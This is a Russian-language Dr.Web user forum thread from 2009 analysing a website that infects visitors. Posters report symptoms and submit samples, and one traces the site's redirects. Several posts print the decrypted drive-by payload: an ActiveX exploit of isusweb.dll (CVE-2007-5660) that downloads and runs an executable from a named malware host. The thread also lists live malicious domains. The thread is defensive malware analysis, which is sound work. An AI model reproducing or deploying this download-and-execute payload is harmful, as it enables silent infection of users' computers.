[sensored].ws
#1
Отправлено 01 Январь 2009 - 16:03
на компьютер попал контент с указанного в топике сайта.
Балун с названием вируса и предупреждением выскочил, но при этом куча соединение с почтовыми серверами, через некоторое время перестает работать сеть, из браузера пропал гугл тулбар. Компьютер зависает.
В процессах появилось имяпользователя.exe, позже из контакт листа icq стали приходить сообщения , что от меня идет спам с рекламой какого-то сайта.
Вопрос: антивирус в комплекте av-desk его таки лечит\понимает или нет?
#2
Отправлено 01 Январь 2009 - 16:23
Для начала - видимый в процессах файл найдите и проверьте в онлайне. Если не определяется, засылайте в лабораторию (ссылка вверху).
#3
Отправлено 03 Январь 2009 - 01:45
Если человек отослал его экземпляр, то значит обновляют часто, редиски.Общие сведения
Для начала - видимый в процессах файл найдите и проверьте в онлайне. Если не определяется, засылайте в лабораторию (ссылка вверху).
Сейчас через Netscape открыл сайт. Показало, Что якобы forbidden. А само потихоньку сайты какие-то подгружало, открылся Acrobat reader. Я его прибил, конечно. Видать, там эксплойт новый под Acrobat.
И на тебе - фаервол спрашивает, разрешить ли запуск e78flw от имени svchost из system32. Файлик нашел в процессах и в каталоге пользователя. Не детектится.
Запретил запуск - процесс пропал, файл остался.
Заслал в вирлаб. Тикет #746309.
#4
Отправлено 03 Январь 2009 - 02:23
Сейчас через Netscape открыл сайт. Показало, Что якобы forbidden. А само потихоньку сайты какие-то подгружало, открылся Acrobat reader. Я его прибил, конечно. Видать, там эксплойт новый под Acrobat.
Видать уже не новый.
И на тебе - фаервол спрашивает, разрешить ли запуск e78flw от имени svchost из system32. Файлик нашел в процессах и в каталоге пользователя. Не детектится.
Запретил запуск - процесс пропал, файл остался.
Заслал в вирлаб. Тикет #746309.
Новый тут
#5
Отправлено 03 Январь 2009 - 02:35
Хм. Пришел ответ:Заслал в вирлаб. Тикет #746309.
Ваш запрос был проанализирован Автоматической Системой. Данный вирус был добавлен в вирусную базу Dr.Web ®
Вирус: Trojan.Botnetlog.1
А он ни с последними обновлениями, ни на онлайн-проверке не ловится.
И ведь на updates есть три записи.
Подожду следующего обновления, а потом, если не будер ловиться, напишу по тикету в вирлаб...
#6
Отправлено 03 Январь 2009 - 02:39
А он ни с последними обновлениями, ни на онлайн-проверке не ловится.
И ведь на updates есть три записи.
Подожду следующего обновления, а потом, если не будер ловиться, напишу по тикету в вирлаб...
Дак Вам что к спеху? и так доброе дело сделали, обычно через час два в базы пользователей приходит, но если учесть что выходные, может быть и дольше. http://forum.drweb.com/public/style_emoticons/default/rolleyes.gif
ЗЫ Гг.. главно что уже ето, не троян, у кучка хлама в карантине.
#7
Отправлено 03 Январь 2009 - 02:53
ну так если на live зайти , то видно, что эта запись в процессе тестированияХм. Пришел ответ:Заслал в вирлаб. Тикет #746309.
Ваш запрос был проанализирован Автоматической Системой. Данный вирус был добавлен в вирусную базу Dr.Web ®
Вирус: Trojan.Botnetlog.1
А он ни с последними обновлениями, ни на онлайн-проверке не ловится.
И ведь на updates есть три записи.
Подожду следующего обновления, а потом, если не будер ловиться, напишу по тикету в вирлаб...
#8
Отправлено 03 Январь 2009 - 03:03
Дак Вам что к спеху? и так доброе дело сделали, обычно через час два в базы пользователей приходит, но если учесть что выходные, может быть и дольше.
Да не, похоже, его еще до того, как я отправил, уже сцапали.
Ну, у меня Гейт пока не проверяет. А там случай интересный. Спайдером ловится только если по прямому url ( который у Вас на скриншоте) грузить в Downlad Master'е, например. Если в браузере, то фиг. Грузится троян и запускается. Вот и тороплюсь, нервничаю.ЗЫ Гг.. главно что уже ето, не троян, у кучка хлама в карантине.
---------
О, вышло обновление. Прекрасно, теперь ловится. http://forum.drweb.com/public/style_emoticons/default/smile.png
Пойду лечиться. Похоже, не просто так троян запускался. В system32 при приеме-передаче почты в Office Outlook Спайдер нашел dll'ку с этим трояном.
#9
Отправлено 03 Январь 2009 - 03:05
Ну так сейчас да. А тогда-то еще не было.ну так если на live зайти , то видно, что эта запись в процессе тестирования
#10
Отправлено 03 Январь 2009 - 04:18
хттп://winesamile.cn/template.html
где находится 2 точно таких же закриптованных скриптов... ладно думаю... и их расшифруем...
первый после расшифровки указал на
хттп://winesamile.cn/top10.html
второй после расшифровки указал на
хттп://whitebiz.cn/euro/index.php
... и оказался недоступным...
хттп://winesamile.cn/top10.html
даёт такой же зашифрованный скрипт... и тут не поленился и расшифровал... получил на выходе ссылку сюда
хттп://papampam.net/in.cgi?pipka3, который меня редиректнул на
хттп://portulote.com/pages.html, в котором уже в обычно виде загружается два ифрейма
первый - хттп://portulote.com/cache/index.php
второй - хттп://dornaboret.com/cache/index.php
первый выдал ручную ошибку о ненайденном документе
второй уже банально вернул 404.
В чём моя ошибка? Что я делал не так? (((
Сообщение было изменено Borka: 03 Январь 2009 - 21:58
отредактированы ссылки
PC3000 UDMA & Data Extractor (производитель НПП АСЕ), Raid Explorer (производитель СОФТ-ЦЕНТР), Flash Extractor & Image Explorer (производитель СОФТ-ЦЕНТР), Victoria Full version (автор Сергей Казанский), R-Studio Data Recovery (производитель R-Tools Technology Inc.), GetDataBack for FAT (производитель Runtime Software), GetDataBack for NTFS (производитель Runtime Software), собственные разработки.
#11
Отправлено 03 Январь 2009 - 04:44
#12
Отправлено 03 Январь 2009 - 04:51
PC3000 UDMA & Data Extractor (производитель НПП АСЕ), Raid Explorer (производитель СОФТ-ЦЕНТР), Flash Extractor & Image Explorer (производитель СОФТ-ЦЕНТР), Victoria Full version (автор Сергей Казанский), R-Studio Data Recovery (производитель R-Tools Technology Inc.), GetDataBack for FAT (производитель Runtime Software), GetDataBack for NTFS (производитель Runtime Software), собственные разработки.
#13
Отправлено 03 Январь 2009 - 11:43
#14
Отправлено 03 Январь 2009 - 12:06
Ну так самая главная ссылка тут в названии темыГраждане,одумайтесь...Зачем же вы ссылочки то вставляете?
#15
Отправлено 08 Январь 2009 - 01:28
А когда заходишь на xttр://arsenal-club.com/ выходит следующее предупреждение если его принять то на комп загружается XPAntivirus2008 и прочий набор вирусов и это при активном SpiderGuard 4.44!
Прикрепленные файлы:
#16
Отправлено 08 Январь 2009 - 01:55
предупреждение если его принять то на комп загружается XPAntivirus2008 и прочий набор вирусов и это при активном SpiderGuard 4.44!
А отвергнуть его не сутьпа?, подумать, а с фига ли к нам Бояре, в гости понаехали, фаервол поставить, перейти на 5, в наше время антивирус в одно лицо не способен устоять, да и вирусо-писатили тоже не дураки.
ЗЫ Нужен комплекс мер по защите вашего ПК. Рупь за сто сайт взломан.....
Aleksandr
Почему он-лайн проверка на вирусы ничего не находит ни по адресу xttр://arsenal-club.com/, ни по xttр://f.5traff.cn/?
Много раз обсуждалось, прячут, редиректят, подменяют, было бы так все просто.......
ЗЫ Я на своем фтр, сертификат имею для FTPS, лично заполнял от фонаря адреса тп, который потом работает как ключь, для шифрованного трафика который кстати не просмотриш, пока сам браузер принятым сертификатом его не расшифрует, имхо наличие оного ни чего не гарантирует.
#17
Отправлено 08 Январь 2009 - 04:18
<OBJECT id=__i01W height=0 width=0 classid=clsid:1DF951B1-8D40-4894-A04C-66AD824A0EEF></OBJECT>
__i01W[DownloadAndExecute]("pow", {11111111-1111-1111-1111-111111111111}, 0, "[cens]tp://f.5traff.cn/load/D15E93/mvflex", "scshost.exe")
Брешь присутствует в файле isusweb.dll (который как раз и идентифицируется как clsid:1DF951B1-8D40-4894-A04C-66AD824A0EEF), который через процедуру DownloadAndExecute выполняет скачивание и обработку удалённых объектов.
Файл скачивается с [cens]tp://f.5traff.cn/load/D15E93/mvflex и судя по всему переименовывается в scshost.exe
mvflex на текущий момент через вирустотал выглядит так:
eSafe 7.0.17.0 2009.01.06 Suspicious File
Sunbelt 3.2.1809.2 2008.12.22 Trojan-Downloader.Win32.Web!cobra (v)
TrendMicro 8.700.0.1004 2009.01.07 PAK_Generic.001
Где-то вот так
PC3000 UDMA & Data Extractor (производитель НПП АСЕ), Raid Explorer (производитель СОФТ-ЦЕНТР), Flash Extractor & Image Explorer (производитель СОФТ-ЦЕНТР), Victoria Full version (автор Сергей Казанский), R-Studio Data Recovery (производитель R-Tools Technology Inc.), GetDataBack for FAT (производитель Runtime Software), GetDataBack for NTFS (производитель Runtime Software), собственные разработки.
#18
Отправлено 08 Январь 2009 - 04:26
хттп://www.ciac.org/ciac/bulletins/r-157.shtml
хттп://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5660"
Тикет #750460
PC3000 UDMA & Data Extractor (производитель НПП АСЕ), Raid Explorer (производитель СОФТ-ЦЕНТР), Flash Extractor & Image Explorer (производитель СОФТ-ЦЕНТР), Victoria Full version (автор Сергей Казанский), R-Studio Data Recovery (производитель R-Tools Technology Inc.), GetDataBack for FAT (производитель Runtime Software), GetDataBack for NTFS (производитель Runtime Software), собственные разработки.
#19
Отправлено 09 Январь 2009 - 21:01
молодец, Разбираешься в сайтах.Скрипт после декрипта принимает следующий вид
<OBJECT id=__i01W height=0 width=0 classid=clsid:1DF951B1-8D40-4894-A04C-66AD824A0EEF></OBJECT>
__i01W[DownloadAndExecute]("pow", {11111111-1111-1111-1111-111111111111}, 0, "[cens]tp://f.5traff.cn/load/D15E93/mvflex", "scshost.exe")
Брешь присутствует в файле isusweb.dll (который как раз и идентифицируется как clsid:1DF951B1-8D40-4894-A04C-66AD824A0EEF), который через процедуру DownloadAndExecute выполняет скачивание и обработку удалённых объектов.
Файл скачивается с [cens]tp://f.5traff.cn/load/D15E93/mvflex и судя по всему переименовывается в scshost.exe
mvflex на текущий момент через вирустотал выглядит так:
eSafe 7.0.17.0 2009.01.06 Suspicious File
Sunbelt 3.2.1809.2 2008.12.22 Trojan-Downloader.Win32.Web!cobra (v)
TrendMicro 8.700.0.1004 2009.01.07 PAK_Generic.001
Где-то вот так
Короче админ сайта бабло рубит на рассаднике вирусов!
#20
Отправлено 09 Январь 2009 - 21:05
Скорей всего сайт просто завирусован. Врядли на этом можно делать деньги.молодец, Разбираешься в сайтах.Скрипт после декрипта принимает следующий вид
<OBJECT id=__i01W height=0 width=0 classid=clsid:1DF951B1-8D40-4894-A04C-66AD824A0EEF></OBJECT>
__i01W[DownloadAndExecute]("pow", {11111111-1111-1111-1111-111111111111}, 0, "[cens]tp://f.5traff.cn/load/D15E93/mvflex", "scshost.exe")
Брешь присутствует в файле isusweb.dll (который как раз и идентифицируется как clsid:1DF951B1-8D40-4894-A04C-66AD824A0EEF), который через процедуру DownloadAndExecute выполняет скачивание и обработку удалённых объектов.
Файл скачивается с [cens]tp://f.5traff.cn/load/D15E93/mvflex и судя по всему переименовывается в scshost.exe
mvflex на текущий момент через вирустотал выглядит так:
eSafe 7.0.17.0 2009.01.06 Suspicious File
Sunbelt 3.2.1809.2 2008.12.22 Trojan-Downloader.Win32.Web!cobra (v)
TrendMicro 8.700.0.1004 2009.01.07 PAK_Generic.001
Где-то вот так
Короче админ сайта бабло рубит на рассаднике вирусов!
PC3000 UDMA & Data Extractor (производитель НПП АСЕ), Raid Explorer (производитель СОФТ-ЦЕНТР), Flash Extractor & Image Explorer (производитель СОФТ-ЦЕНТР), Victoria Full version (автор Сергей Казанский), R-Studio Data Recovery (производитель R-Tools Technology Inc.), GetDataBack for FAT (производитель Runtime Software), GetDataBack for NTFS (производитель Runtime Software), собственные разработки.
Читают тему: 0
0 пользователей, 0 гостей, 0 скрытых